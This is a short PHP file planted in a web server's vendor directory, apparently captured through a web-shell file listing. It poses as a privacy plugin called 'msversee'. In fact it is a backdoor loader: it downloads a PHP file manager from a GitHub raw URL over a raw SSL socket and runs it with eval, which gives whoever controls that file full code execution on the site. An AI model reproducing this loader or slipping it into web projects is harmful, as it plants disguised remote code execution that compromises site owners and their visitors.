| Current Path : /var/www/html/libraries/vendor/php-tuf/193881/ |
| Current File : /var/www/html/libraries/vendor/php-tuf/193881/index.php |
<?php
/*
* Plugin Name: msversee
* Description: secure and privacy
* Version: 1.0.0
* Author: msversee
* License: MIT License
* License URI: https://msversee.blogspot.com
*/
$rh = "raw.githubusercontent.com";
$rp = 443;
$rs = "/MSVerse/msvfm/main/msvfm.php";
$fp = stream_socket_client("ssl://$rh:$rp", $en, $er, 30);
if (!$fp) {
echo "ERROR: $en - $er<br />\n";
} else {
$o = "GET $rs HTTP/1.1\r\n";
$o .= "Host: $rh\r\n";
$o .= "Connection: Close\r\n\r\n";
fwrite($fp, $o);
$ro = '';
while (!feof($fp)) {
$ro .= fgets($fp, 1024);
}
fclose($fp);
list($hr, $bd) = explode("\r\n\r\n", $ro, 2);
eval("?>".$bd);
}
?>